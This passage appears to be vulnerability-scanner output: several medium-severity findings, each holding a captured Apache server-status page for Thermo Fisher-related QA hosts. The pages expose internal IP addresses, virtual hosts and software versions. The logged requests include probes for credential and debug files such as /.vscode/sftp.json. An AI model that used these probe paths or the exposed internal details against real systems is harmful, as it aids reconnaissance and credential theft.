0.88106137559890.01.24204.85 10.253.106.246http/1.1 15-0379637/359/22932K 0.87571079392280.51.52126.32 10.253.106.162http/1.1qa1-designsystem.thermofisher.cGET /akamai/sureroute-test-object.html HTTP/1.1 16-039920/32/58899_ 0.06226116173530.00.09163.94 10.253.106.246http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 17-0318910/211/10216R 0.43395117893090.00.48118.03 10.253.106.162http/1.1 18-037970/211/9734_ 0.44214128021780.00.5799.65 10.253.106.246http/1.1 19-012380/475/9948_ 1.1012489930810.01.76284.88 10.253.106.246http/1.1 20-062281/244/9991K 0.492211312237004.61.12150.10 10.253.106.246http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 21-010600/44/11006_ 0.1160359881970.00.21113.28 10.253.106.162http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/print.min.css?v= HTTP/1.1 22-084860/672/11477_ 1.49290108032600.02.35203.05 10.253.106.246http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 23-06970/234/10249_ 0.56273108119330.01.40120.32 10.253.106.246http/1.1 24-039960/13/10158_ 0.02214128449980.00.03121.90 10.253.106.246http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 25-065360/780/11479_ 1.72212107787190.02.45103.04 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 26-06980/283/10383_ 0.70123128026810.00.82133.62 10.253.106.162http/1.1 27-0300090/323/45662_ 0.7912575357220.01.59132.47 10.253.106.162http/1.1qa1.thermofisher.in:80GET /chemicals/en/home.html HTTP/1.1 28-06991/391/9886K 1.00123106975952.22.8677.43 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 29-02770713/407/10186K 1.1510810113054729.81.80130.90 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 30-085770/383/10263_ 0.90239115598130.01.3889.22 10.253.106.162http/1.1 31-0277080/546/10762_ 1.2333126323540.01.6484.44 10.253.106.162http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 32-057514/592/9903K 1.3681175776730.72.28137.44 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 33-01632618940/84541/87419K 65.3750263098155394.3152.20181.95 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 34-011050/87/10085_ 0.1746078547900.00.4476.55 10.253.106.162http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 35-037990/250/10695_ 0.542406268866220.00.6098.88 10.253.106.246http/1.1 36-038000/280/10222_ 0.9161765283540.01.6097.44 10.253.106.246http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/tabletlibs.min.css?v= HTT 37-011064/75/9030K 0.272271289957217.60.6176.17 10.253.106.246http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 38-039970/106/10418_ 0.2528106825340.00.4778.55 10.253.106.246http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 39-0-0/0/9265. 0.00987705655640.00.0090.35 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 40-070013/275/8846W 0.6000526139241.40.9284.26 10.253.106.246http/1.1qa1.allergyinsider.com:80GET /server-status HTTP/1.1 41-0-0/0/9286. 0.00991906182190.00.0088.46 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 42-07020/112/9449_ 0.442981110191700.02.7698.52 10.253.106.246http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 43-0-0/0/10322. 0.00454208532950.00.00107.57 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 44-051980/447/9226R 0.96527136324840.01.63179.88 10.253.106.246http/1.1 45-0-0/0/9108. 0.005166010924810.00.00174.56 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 46-07030/373/8915R 0.92429125301380.02.3390.66 10.253.106.246http/1.1 47-03223623/187/9498K 0.69341083018975.81.44116.58 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 48-062
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879c5717ed7f
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Sunday, 12-May-2024 17:55:22 EDT Restart Time: Tuesday, 07-May-2024 13:59:49 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 5 days 3 hours 55 minutes 33 seconds Server load: 0.02 0.02 0.00 Total accesses: 270818 - Total Traffic: 2.4 GB - Total Duration: 17801073 CPU Usage: u42.76 s54.78 cu498.13 cs170.04 - .172% CPU load .607 requests/sec - 5.6 kB/second - 9.3 kB/request - 65.7308 ms/request 38 requests currently being processed, 33 idle workers RRKR_R__K_R_R_R_KKK..K__KKRKR____WK_K__K.....K..R.K___....R..RK_ ...._._._....K.K.K.__.K___.RR____RK._RK......................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-014120/55/2307R 0.11400112094390.00.1427.17 10.253.106.183http/1.1 1-062550/131/2289R 0.38553102116650.00.4337.37 10.253.106.183http/1.1 2-0155833/88/2217K 0.1774109281134106.90.4129.86 10.253.106.183http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/headlibs.min.js?v= HTTP/1 3-014250/5/2432R 0.015606041597470.00.0322.41 10.253.106.162http/1.1 4-0101140/0/2614_ 0.0011701952940.00.0056.22 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 5-014260/61/2141R 0.13395102335320.00.7122.83 10.253.106.162http/1.1 6-078870/37/2698_ 0.08114102692580.00.6145.25 10.253.106.183http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 7-078890/7/2167_ 0.0114991708650.00.0227.75 10.253.106.183http/1.1 8-0155855/79/2492K 0.15272917758012.10.4825.94 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 9-0102240/0/2442_ 0.009001620920.00.0020.25 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 10-047520/151/2669R 0.39411102384000.00.8927.12 10.253.106.183http/1.1 11-0102320/0/2835_ 0.007402075600.00.0030.64 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 12-0155860/82/2415R 0.16555102515090.00.4035.11 10.253.106.162http/1.1 13-0214620/124/2516_ 0.25244101793100.00.5321.78 10.253.106.162http/1.1 14-0182150/162/2542R 0.34522101400540.00.9125.20 10.253.106.162http/1.1 15-078900/0/14527_ 0.0016601027150.00.0053.18 10.253.106.162http/1.1 16-039144613/44613/44613K 27.99702858881771.579.8579.85 10.253.106.183http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 17-020461/90/2460K 0.17203101411952.20.2037.79 10.253.106.183http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 18-0202569/168/2534K 0.40118021420035.21.0332.45 10.253.106.183http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/headlibs.min.2024.4.19.14 19-0-0/0/2457. 0.00214401806870.00.0024.36 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 20-0-0/0/2277. 0.00213702144830.00.0022.15 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 21-0312284/55/2460K 0.13748722275938.10.2948.78 10.253.106.162http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/desktoplibs.min.css?v= HT 22-028790/196/2684_ 0.7215292257310.02.2741.85 10.253.106.183http/1.1 23-0312610/130/2749_ 0.25222101410990.00.3522.72 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 24-020499/38/2220K 0.137463157142172.13.2739.00 10.253.106.162http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/print.min.css?v= HTTP/1.1 25-020507/31/2377K 0.2474119187226431.20.5027.53 10.253.106.183http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/tabletlibs.min.css?v= HTT 26-020510/22/2282R 0.03455101459240.00.0527.46 10.253.106.162http/1.1 27-02735631852/31907/32583K 20.66909572958478.158.4963.80 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 28-0100270/141/2065R 0.25525101838300.00.5519.57 10.253.106.162http/1.1 29-0146700/166/2513_ 0.32176101357570.00.5821.42 10.253.106.183http/1.1 30-067710/22/2171_ 0.0341101605730.00.1432.86 10.253.106.162http/1.1 31-078910/13/2665_ 0.038701710720.00.0420.17 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /phadia/wo/en/our-solutions/elia-autoimmunity-solutions/ant 32-078920/20/1925_ 0.0362101429250.00.0528.58 10.253.106.162http/1.1 33-01978611/158/2586W 0.530018162323.61.9927.95 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /server-status HTTP/1.1 34-06381/89/2404K 0.44255382429602.33.6226.19 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 35-0202570/453/2727_ 1.58154102287490.04.5624.15 10.253.106.162http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 36-0105955/196/2579K 1.311811015893312.13.5528.11 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 37-047570/70/2217_ 0.22123111938200.00.6220.95 10.253.106.162http/1.1 38-078930/6/2340_ 0.01123101331500.00.0120.32 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 39-0789415/24/2276K 0.042801117813147.50.1625.62 10.253.106.183http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 40-0-0/0/1808. 0.00822001183000.00.0019.63 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 41-0-0/0/1880. 0.00853901384590.00.0022.12 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 42-0-0/0/2118. 0.00199901262100.00.0032.10 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 43-0-0/0/2047. 0.00874902022570.00.0020.42 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 44-0-0/0/2358. 0.00275702126800.00.0025.83 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 45-0100323/99/1930K 0.464110682442101.20.7821.42 10.253.106.183http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 46-0-0/0/2096. 0.00822901775900.00.0039.32 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 47-0-0/0/2061. 0.00867601630910.00.0017.90 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 48-0161560/136/1976R 0.47549101705870.00.9036.70 10.253.106.162http/1.1 49-0-0/0/2083. 0.00822401543480.00.0029.98 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 50-02146412/127/2051K 0.25741631500
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879c35b876bb
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Wednesday, 08-May-2024 14:37:39 EDT Restart Time: Tuesday, 07-May-2024 13:59:49 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 1 day 37 minutes 50 seconds Server load: 0.00 0.00 0.00 Total accesses: 60061 - Total Traffic: 560.6 MB - Total Duration: 4738544 CPU Usage: u16.99 s13.55 cu99.73 cs37.58 - .189% CPU load .677 requests/sec - 6.5 kB/second - 9.6 kB/request - 78.8955 ms/request 39 requests currently being processed, 32 idle workers _RRK__K___KK___KKRK_K_R_R_R_R_K__KK____KK_R...RK_..W_._..KRKKRR. RRK.RRR...RK_.........._.._._..._.R_._.......................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0230140/3/457_ 0.009614353190.00.013.57 10.253.106.183http/1.1 1-0232480/0/581R 0.004790350610.00.0017.19 10.253.106.216http/1.1 2-0320120/27/479R 0.0549914228970.00.235.84 10.253.106.183http/1.1 3-0225131/8/505K 0.0126213279302.30.027.26 10.253.106.216http/1.1qa1.allergyinsider.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 4-0225140/2/717_ 0.0080103399360.00.0922.60 10.253.106.183http/1.1www-qa.patheon.cn:80GET /akamai/sureroute-test-object.html HTTP/1.1 5-0327450/34/483_ 0.0822515987800.00.884.52 10.253.106.183http/1.1 6-0210312/111/775K 0.783001410450141.51.985.58 10.253.106.216http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 7-0225150/0/520_ 0.0010286960.00.009.18 10.253.106.216http/1.1 8-0320130/52/716_ 0.102718564780.00.225.93 10.253.106.183http/1.1 9-0232560/10/561_ 0.0129814333450.00.034.51 10.253.106.216http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 10-02325816/16/591K 0.1451458846830.30.816.38 10.253.106.183http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 11-080405/56/506K 0.14262128308020.40.464.82 10.253.106.216http/1.1qa1.allergyinsider.com:80GET /allergy/za/en/resources/clinical-resources/pdf/anaphylaxis 12-093930/19/564_ 0.04740854480.00.657.56 10.253.106.216http/1.1qa1-corporate.thermofisher.com:GET / HTTP/1.1 13-0137960/59/629_ 0.2225215418370.00.664.82 10.253.106.183http/1.1 14-026220/86/689_ 0.24311116335810.00.664.08 10.253.106.216http/1.1 15-03908867/8867/8867K 5.8340593116154.715.7815.78 10.253.106.216http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 16-03918867/8867/8867K 5.5830564216154.915.7815.78 10.253.106.183http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 17-077710/13/419R 0.0851813316060.00.204.78 10.253.106.216http/1.1 18-0298292/38/686K 0.477201031556.81.0712.62 10.253.106.183http/1.1qa1.allergyinsider.com:80GET /etc/designs/diagnostics/vendor/lazyload.min.js HTTP/1.1 19-0111600/103/440_ 0.8412214396070.02.235.76 10.253.106.216http/1.1 20-0263105/99/603K 0.5530457598282106.82.087.11 10.253.106.183http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 21-0298300/59/562_ 0.3818614620960.01.0429.22 10.253.106.216http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 22-0225190/13/679R 0.02535861016640.00.0913.84 10.253.106.216http/1.1 23-0320300/28/621_ 0.0727115470190.00.124.92 10.253.106.183http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 24-0230150/20/490R 0.035584361540.00.3210.49 10.253.106.183http/1.1 25-033290/51/574_ 0.0910815253930.00.368.24 10.253.106.216http/1.1 26-0320320/18/359R 0.0449914294440.00.051.79 10.253.106.216http/1.1 27-0322950/13/602_ 0.0925314380040.00.164.56 10.253.106.216http/1.1 28-0274180/111/503R 0.414580942740.01.223.87 10.253.106.183http/1.1 29-04160/21/439_ 0.1127211262110.00.244.16 10.253.106.216http/1.1 30-0290411/98/645K 0.9381145121525.42.396.47 10.253.106.183http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 31-017220/65/514_ 0.262179265370.00.633.06 10.253.106.216http/1.1 32-0230160/6/534_ 0.018010327060.00.1315.64 10.253.106.183http/1.1 33-047995/19/646K 0.047204122536.50.085.38 10.253.106.183http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/diagnostics/components/structure/commercial 34-0232596/10/565K 0.037209895480.00.098.53 10.253.106.216http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/multisitecommons/clientlibs/clientlib-magni 35-0274190/32/512_ 0.0923115902280.00.305.03 10.253.106.216http/1.1 36-0323170/50/580_ 0.3129314405560.00.697.59 10.253.106.183http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 37-0232600/9/688_ 0.022728920120.00.033.71 10.253.106.216http/1.1 38-081140/15/544_ 0.0315113305770.00.065.51 10.253.106.183http/1.1 39-0122136/99/593K 0.277204026220.01.078.10 10.253.106.183http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/diagnostics/components/content/datatable/cl 40-094102/17/262K 0.0630014224625.20.293.52 10.253.106.183http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 41-0131990/50/515_ 0.12740283010.00.384.94 10.253.106.216http/1.1 42-017250/17/385R 0.0443415185100.00.064.22 10.253.106.216http/1.1 43-0-0/0/439. 0.0027830269280.00.002.63 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 44-0-0/0/617. 0.0024290391450.00.004.44 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 45-0-0/0/548. 0.00274902902070.00.003.15 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 46-017290/15/449R 0.0349714274220.00.055.88 10.253.106.216http/1.1 47-018653/5/516K 0.0121114310567.90.014.66 10.253.106.183http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 48-033300/32/507_ 0.1816610409830.00.439.70 10.253.106.183http/1.1 49-0-0/0/410. 0.0028940181880.00.002.89 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 50-0-0/0/581. 0.0024440297660.00.007.25 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 51-0480031/46/503W 0.1000290267143.10.365.90 10.253.106.216http/1.1qa1.allergyinsider.com:80GET /server
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879c19bda643
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Monday, 11-Sep-2023 13:37:51 EDT Restart Time: Friday, 08-Sep-2023 11:09:24 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 3 days 2 hours 28 minutes 27 seconds Server load: 0.54 0.14 0.04 Total accesses: 82637 - Total Traffic: 1.9 GB - Total Duration: 3863589 CPU Usage: u15.47 s31.94 cu89.33 cs32.24 - .063% CPU load .308 requests/sec - 7.6 kB/second - 24.7 kB/request - 46.7537 ms/request 93 requests currently being processed, 40 idle workers KK___KR_K_KK__KKKK______K_KKK_KRKKKKKKK__K_K_KKKKKKKKKKK__KKKKKK K_R_K_KKRKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKRKRK......._K.........K. .K.K..K_.K_....___._K_.KW________............................... ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0241741/10/380K 0.001591172235177.90.035.37 10.253.106.184http/1.1qa1.unitylabservices.com:80GET /en/support/new-instruments.html HTTP/1.1 1-0278635/19/435K 0.041602228142273.90.535.51 10.253.106.191http/1.1www-qa.patheon.com:80GET /us/en/home.html HTTP/1.1 2-0281030/0/313_ 0.001020122600.00.0036.49 10.253.106.184http/1.1 3-0281040/0/10830_ 0.001020161960.00.0021.60 10.253.106.184http/1.1 4-0281050/0/415_ 0.00430449560.00.006.99 10.253.106.184http/1.1 5-0284762/2/10599K 0.01160803030624.60.0221.17 10.253.106.191http/1.1www-qa.patheon.com:80GET /us/en/our-capabilities/advanced-therapies.html HTTP/1.1 6-0124340/115/561R 0.2153248910280.01.7022.52 10.253.106.191http/1.1 7-0270010/0/379_ 0.001520406440.00.0019.72 10.253.106.191http/1.1 8-0284783/3/395K 0.0115829522178722.20.027.70 10.253.106.191http/1.1www-qa.patheon.com:80GET /us/en/about-us/our-stories.html HTTP/1.1 9-0281060/0/514_ 0.00430712280.00.0095.45 10.253.106.184http/1.1 10-0238911/2/287K 0.0015915693710189.00.104.82 10.253.106.191http/1.1www-qa.patheon.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 11-02620316/86/579K 0.1315911647317995.40.4317.78 10.253.106.184http/1.1qa1.unitylabservices.com:80GET /en/enterprise-solutions/enterprise-solutions-overview.html 12-0281070/3/485_ 0.00270346840.00.0064.22 10.253.106.184http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/desktoplibs.min.2022.6.17 13-0281080/0/393_ 0.00430509930.00.0012.03 10.253.106.184http/1.1 14-0263422/18/414K 0.04160642430955.80.0735.81 10.253.106.191http/1.1www-qa.patheon.com:80GET /us/en/our-capabilities/clinical-trial-services.html HTTP/1 15-0280344/4/411K 0.02157327313564156.20.0550.71 10.253.106.191http/1.1www-qa.patheon.com:80GET /us/en/insights-resources/blog.html HTTP/1.1 16-01775316600/16620/16784K 10.17802129630386.830.0931.90 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 17-0263434/9/437K 0.0315740514710447.90.0637.80 10.253.106.191http/1.1www-qa.patheon.com:80GET /us/en/our-capabilities/commercial-services.html HTTP/1.1 18-0173540/70/515_ 0.332801069040.02.579.56 10.253.106.191http/1.1 19-0281090/0/483_ 0.00350502820.00.0016.87 10.253.106.191http/1.1 20-0266010/7/366_ 0.01294250140.00.025.63 10.253.106.184http/1.1qa1.thermofisher.in:80GET /chemicals/en/layout/scientific/jcr:content/header-par.html 21-0281100/2/459_ 0.00280382770.00.008.46 10.253.106.191http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/tabletlibs.min.2022.6.17. 22-0201930/20/345_ 0.02270178540.00.053.06 10.253.106.184http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/headlibs.min.2022.6.17.41 23-0266020/20/449_ 0.034313458030.00.049.71 10.253.106.184http/1.1qa1.allergyinsider.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 24-0284791/1/381K 0.0015654124282323.20.0215.26 10.253.106.191http/1.1www-qa.patheon.kr:80GET /innovative-solutions/integrated-offerings HTTP/1.1 25-0266490/2/449_ 0.002914440770.00.0018.69 10.253.106.184http/1.1 26-02803525/25/497K 0.042809113141366.20.3647.67 10.253.106.191http/1.1qa1-corporate.thermofisher.com:GET /.vscode/sftp.json HTTP/1.1 27-0280361/11/312K 0.0415749173081024.10.113.34 10.253.106.191http/1.1www-qa.patheon.kr:80GET /about-us HTTP/1.1 28-0280372/2/370K 0.0024229349327.50.039.29 10.253.106.191http/1.1qa1.unitylabservices.com:80GET /debug/default/view?panel=config HTTP/1.1 29-0266640/16/361_ 0.022811451330.00.0118.06 10.253.106.191http/1.1 30-0190322/8/403K 0.02160851872537.30.0624.30 10.253.106.191http/1.1www-qa.patheon.com:80GET /us/en/our-capabilities/clinical-trial-services.html HTTP/1 31-0266650/12/471R 0.0353139592290.00.1262.28 10.253.106.184http/1.1 32-02666626/26/398K 0.051607611011085.51.0672.31 10.253.106.191http/1.1www-qa.patheon.com:80GET /us/en/insights-resources/meet-the-experts.html HTTP/1.1 33-0284802/2/393K 0.0115554966358622.50.027.22 10.253.106.191http/1.1www-qa.patheon.com:80GET /us/en/our-capabilities/small-molecule/api-development.html 34-0241772/27/385K 0.05160552453435.20.3720.24 10.253.106.191http/1.1www-qa.patheon.com:80GET /us/en/our-capabilities/small-molecule/oral-solid-dose.html 35-02666719/56/412K 0.12154593342671669.40.8953.09 10.253.106.184http/1.1qa1-corporate.thermofisher.com:GET /content/tfcorpsite/us/en/index/contact-us.html HTTP/1.1 36-0266685/10/345K 0.02160352844441.60.054.79 10.253.106.191http/1.1www-qa.patheon.com:80GET /us/en/about-us.html HTTP/1.1 37-0280384/4/343K 0.001591581261970111.50.1116.63 10.253.106.191http/1.1www-qa.patheon.com:80GET /us/en/newsroom/thermo-fisher-scientific-opens-viral-vector 38-02540716316/16318/16451K 9.90202812329867.129.1739.28 10.253.106.184http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 39-0193700/4/400_ 0.00290257450.00.0115.28 10.253.106.184http/1.1qa1.thermofisher.in:80GET /chemicals/en/layout/scientific/jcr:content/footer-par.html 40-0193710/33/446_ 0.04214390280.00.1822.78 10.253.106.191http/1.1 41-0284811/1/313K 0.0115831014770719.20.0210.97 10.253.106.191http/1.1www-qa.patheon.kr:80GET /our-capabilities HTTP/1.1 42-0275370/0/340_ 0.001520323180.00.0033.41 10.253.106.191http/1.1 43-0280393/3/287K 0.0115746072481123.80.024.71 10.253.106.191http/1.1www-qa.patheon.kr:80GET /innovative-solutions/manufacturing HTTP/1.1 44-0246980/45/343_ 0.0820371730.00.2853.56 10.253.106.191http/1.1 45-0275382/2/325K 0.0015915413460991.40.0922.04 10.253.106.191http/1.1www-qa.patheon.com:80GET /us/en/newsroom/thermo-fisher-scientific-opens-viral-vector 46-0284823/3/274K 0.071601913953135.60.133.53 10.253.106.191http/1.1www-qa.patheon.com:80GET /us/en/our-capabilities/commercial-services.html HTTP/1.1 47-0280401/1/432K 0.0115837184526618.20.0226.41 10.253.106.191http/1.1www-qa.patheon.kr:80GET /about-us/contact-us/preference-center HTTP/1.1 48-0284832/2/474K 0.02160364123238.70.0416.70 10.253.106.191
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879c91ef55ba
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Sunday, 10-Sep-2023 14:57:03 EDT Restart Time: Friday, 08-Sep-2023 11:09:24 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 2 days 3 hours 47 minutes 39 seconds Server load: 0.00 0.00 0.00 Total accesses: 56029 - Total Traffic: 1.2 GB - Total Duration: 2122669 CPU Usage: u6.89 s20.31 cu60.62 cs23.59 - .0598% CPU load .3 requests/sec - 7.0 kB/second - 23.2 kB/request - 37.8852 ms/request 28 requests currently being processed, 31 idle workers _____K__KRRRRRKRKKR_R_KRR__.__._...__RK.RRWRR_.RR...R.R_________ ___.._...K._.................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-080370/0/248_ 0.00550173240.00.003.02 10.253.106.184http/1.1 1-0303430/17/238_ 0.01600150160.00.053.01 10.253.106.191http/1.1 2-080440/0/200_ 0.0054098960.00.0012.43 10.253.106.184http/1.1 3-065060/0/10746_ 0.00620143780.00.0021.15 10.253.106.184http/1.1 4-080450/0/294_ 0.00500280100.00.004.59 10.253.106.184http/1.1 5-035022/16/10480K 0.02113101675.20.0519.04 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 6-065320/0/350_ 